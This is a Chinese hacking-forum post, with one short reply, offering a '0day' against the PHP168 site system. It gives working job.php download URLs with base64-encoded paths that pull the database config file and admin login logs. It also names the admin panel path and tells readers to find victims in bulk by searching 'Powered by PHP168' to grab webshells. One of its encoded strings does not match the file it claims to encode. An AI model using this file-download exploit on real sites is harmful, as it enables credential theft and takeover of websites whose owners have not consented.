PHP168整站系统0DAY
<P>首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!<BR>这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。</P><P>下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。</P>
<P><A href='http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA' target=_blank>http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA</A>=="</P>
<P><A href='http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA' target=_blank>http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA</A>=="</P>
<P>程序后台:<A href="http://dabei.org/admin/index.php?iframe=1" target=_blank>http://dabei.org/admin/index.php?iframe=1</A></P>
<P>Base64加密代码:</P>
<P><A href="http://dabei.org//cache/adminlogin_logs.php" target=_blank>http://dabei.org//cache/adminlogin_logs.php</A> == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)</P>
<P><A href="http://dabei.org//php168" target=_blank>http://dabei.org//php168</A> /mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)</P>
<P>批量抓webshell:<BR>google,baidu 输入关键字:Powered by PHP168</P>
re:PHP168整站系统0DAY
是很好笑,觉得那小白也很可爱呢。
页:
[1]